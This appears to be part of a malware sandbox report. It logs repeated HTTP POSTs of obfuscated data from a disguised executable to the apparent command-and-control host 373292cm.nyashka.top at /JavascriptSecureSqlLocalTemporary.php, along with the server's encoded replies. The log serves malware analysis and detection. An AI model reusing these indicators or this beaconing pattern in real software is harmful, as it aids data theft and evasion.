                                    Data Ascii: ;,="Z<9T $Z5 ]$/_<9Z2U7]*,-"82;.+2-1)K=!$/)=#-83^6T0!=8'99B +Q[3[#)9_76?Q=RW;.&0";-;02/<:Z+>:<3-/&-&<<_"/0-=0'%.X>>/+@;>)+?;5,>:)VY)75=9/33UU7-;3,13^8Z0:
                                    Aug 25, 2024 15:45:50.104224920 CEST4944OUTData Raw: 37 1f 33 3b 30 06 19 5f 0e 08 00 14 35 5e 2e 43 28 3b 02 15 04 05 28 1c 31 0d 10 5c 0b 0a 28 37 22 16 09 1d 31 3c 19 33 36 1d 57 14 30 34 52 5a 32 04 33 2e 27 0e 52 20 31 2f 24 1c 31 05 0c 34 3c 38 2d 1a 3e 58 27 34 3b 01 36 1b 29 2e 31 09 25 5a
                                    Data Ascii: 73;0_5^.C(;(1\(7"1<36W04RZ23.'R 1/$14<8->X'4;6).1%Z/V'%?&Y\Z$!=]9]*$<P3"*W=<.S,?U_!;^(-1X>)3#?,^3Z=?1%0>>W=3T=7=?";,7=.]Z([XX.X'_-8>">(!1#+0.]##!TXZ+
                                    Aug 25, 2024 15:45:50.104249954 CEST4944OUTData Raw: 0f 2e 5b 27 07 24 5b 04 30 04 29 21 0a 29 35 2c 26 59 15 3e 05 38 34 1e 3d 12 07 5c 29 2a 3e 54 13 12 1d 33 22 29 27 1e 06 02 17 20 05 34 3e 1d 33 21 5b 51 39 06 11 55 0c 2d 09 53 34 3f 0b 1d 04 06 30 1e 0f 3b 27 12 0c 31 31 08 0a 0c 3e 1e 0a 39
                                    Data Ascii: .['$[0)!)5,&Y>84=\)*>T3")' 4>3![Q9U-S4?0;'11>9+:<!T0=)Z>=*&?0P(=2"437X&\>1=X%==3X=49&,9&"TY:X')0/3#!";!(<??2>Y?<&(<_+"-0>&$=:8#8][!3>S,19%(P;U!?7.2,)%:
                                    Aug 25, 2024 15:45:50.393665075 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:50.607156038 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:51.210525036 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:51.215044022 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:51.421960115 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:52.018244982 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 54 29 1c 22 5a 32 02 27 08 25 23 08 10 2a 03 05 5b 3e 3e 36 04 25 3b 35 14 27 3e 2b 0f 24 3b 25 5d 28 3d 29 0a 25 3f 30 03 3a 34 2b 5d 0c 13 21 07 34 04 36 5a 31 2c 20 5c 2a 38 05 5e 21 5a 3e 5a 2b 3a 07 52 28 3f 27 03 28 3a 3c 01 3c 3a 2a 57 38 06 21 5c 39 09 26 55 23 3e 2b 52 0d 11 24 52 3c 03 31 1e 29 2e 16 04 22 2b 33 59 27 03 0f 0f 26 1c 2a 52 27 17 33 03 26 0c 2a 0d 25 21 3d 55 32 38 35 01 32 2c 25 55 22 08 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &T)"Z2'%#*[>>6%;5'>+$;%](=)%?0:4+]!46Z1, \*8^!Z>Z+:R(?'(:<<:*W8!\9&U#>+R$R<1)."+3Y'&*R'3&*%!=U2852,%U"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.84971980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:50.013055086 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:50.374258995 CEST2544OUTData Raw: 5f 56 5c 55 51 40 51 5b 5b 5f 5a 51 59 56 58 50 57 5d 5d 5e 57 58 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\UQ@Q[[_ZQYVXPW]]^WXSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q..30"=<#0&==/?.+>'Y#<7*)3^# %;&F$.Y/!
                                    Aug 25, 2024 15:45:50.681253910 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:50.879744053 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.84972180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:51.036189079 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:51.386404037 CEST2544OUTData Raw: 5f 50 5c 5e 51 42 54 5d 5b 5f 5a 51 59 52 58 51 57 51 5d 53 57 5d 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _P\^QBT][_ZQYRXQWQ]SW]SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8#@6-$_ 3!=[#+>9_+>$4?<#'*)4#0*,&F$.Y/1
                                    Aug 25, 2024 15:45:51.725287914 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:51.916224957 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.84972280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:52.047452927 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:52.402631998 CEST2544OUTData Raw: 5f 51 5c 52 54 41 51 5a 5b 5f 5a 51 59 51 58 53 57 5e 5d 5c 57 5e 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _Q\RTAQZ[_ZQYQXSW^]\W^SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q._;#6=X4)^(\(-7[ #1V?9^"#)/.&F$.Y/=
                                    Aug 25, 2024 15:45:52.754246950 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:52.887603998 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.84972380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:53.087724924 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:53.437021971 CEST2536OUTData Raw: 5a 56 5c 56 51 40 54 5d 5b 5f 5a 51 59 57 58 50 57 59 5d 53 57 51 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\VQ@T][_ZQYWXPWY]SWQSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y/U<"-_7&='?.]?=47#<W+9+#%^.>&F$.Y/
                                    Aug 25, 2024 15:45:53.771286011 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:53.901833057 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.84972580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:54.028970957 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:54.386437893 CEST2544OUTData Raw: 5f 55 59 54 51 40 54 5c 5b 5f 5a 51 59 55 58 51 57 58 5d 59 57 5a 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _UYTQ@T\[_ZQYUXQWX]YWZSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/06-07[+-+-6?>(4!!<Q**<49_;>&F$.Y/-
                                    Aug 25, 2024 15:45:54.739362955 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:54.870296955 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.84972680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:54.997898102 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:55.355242014 CEST2544OUTData Raw: 5f 50 59 57 51 42 51 5b 5b 5f 5a 51 59 56 58 50 57 5a 5d 5a 57 5a 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYWQBQ[[_ZQYVXPWZ]ZWZS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,U'A!<\7#9X+-$Y(X6<(7/ !<<:7Y4V%],>&F$.Y/!
                                    Aug 25, 2024 15:45:55.661264896 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:55.793395042 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.84972780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:56.153425932 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:56.511480093 CEST2544OUTData Raw: 5f 51 5c 52 54 46 54 5c 5b 5f 5a 51 59 50 58 56 57 5d 5d 5e 57 5e 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _Q\RTFT\[_ZQYPXVW]]^W^S[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y.#'B#. %Y>.<_+%(=<#' "'?)3Y 05,&F$.Y/
                                    Aug 25, 2024 15:45:56.816633940 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:57.019999027 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.84972880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:57.033442020 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:57.386363029 CEST1860OUTData Raw: 5f 52 5c 51 54 47 51 59 5b 5f 5a 51 59 5f 58 56 57 58 5d 5c 57 5d 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _R\QTGQY[_ZQY_XVWX]\W]S\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.. $64 0>=/+*<.44<7#!,V<:'_ #*/&F$.Y/
                                    Aug 25, 2024 15:45:57.698116064 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:57.825965881 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0e 2a 0b 36 58 32 28 30 55 33 33 08 53 3d 03 2b 5b 3d 13 29 17 33 38 25 1a 32 00 24 1c 30 3b 0c 05 3f 00 0f 0e 24 3f 2b 5a 39 34 2b 5d 0c 13 22 16 37 5c 32 59 32 12 2f 02 3d 3b 28 04 22 12 2a 5b 3c 3a 25 55 3f 2c 2c 5a 28 17 09 59 2b 3a 3d 0f 2c 06 21 5c 39 0e 00 54 22 2e 2b 52 0d 11 24 52 28 03 3e 0e 29 00 2b 58 21 28 06 07 24 5b 39 0d 25 0c 3a 55 30 39 38 5c 31 0c 3d 50 30 31 3e 0e 25 2b 26 5a 26 2c 22 0c 35 08 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %*6X2(0U33S=+[=)38%2$0;?$?+Z94+]"7\2Y2/=;("*[<:%U?,,Z(Y+:=,!\9T".+R$R(>)+X!($[9%:U098\1=P01>%+&Z&,"5#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.84972980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:57.177337885 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:57.526995897 CEST2544OUTData Raw: 5f 5d 59 57 51 40 54 5d 5b 5f 5a 51 59 52 58 57 57 58 5d 5c 57 51 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]YWQ@T][_ZQYRXWWX]\WQSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/("[$]7#").<_?>+[ ?+#1(94,&F$.Y/1
                                    Aug 25, 2024 15:45:57.870264053 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:58.007872105 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.84973080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:58.146270037 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:58.529500961 CEST2544OUTData Raw: 5a 51 5c 56 54 45 54 5a 5b 5f 5a 51 59 5e 58 53 57 59 5d 5c 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\VTETZ[_ZQY^XSWY]\W\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.;#;B".# 05=(X:(.<"??V!1<P(*87=/.&F$.Y/
                                    Aug 25, 2024 15:45:58.843067884 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:58.973478079 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.84973180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:59.110080004 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:59.464617014 CEST2544OUTData Raw: 5f 51 59 50 54 42 54 5c 5b 5f 5a 51 59 54 58 50 57 51 5d 5d 57 58 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _QYPTBT\[_ZQYTXPWQ]]WXSTYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y8'6> V5)(^(%\?'4?0 (?*# V%X/&F$.Y/)
                                    Aug 25, 2024 15:45:59.840971947 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:59.975656033 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.84973280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:00.115777016 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:00.464634895 CEST2544OUTData Raw: 5a 52 5c 56 51 43 54 59 5b 5f 5a 51 59 55 58 55 57 58 5d 53 57 58 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\VQCTY[_ZQYUXUWX]SWXS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,,#-;4*0^(==(]##!/+_7705\;.&F$.Y/-
                                    Aug 25, 2024 15:46:00.779917955 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:00.916496038 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
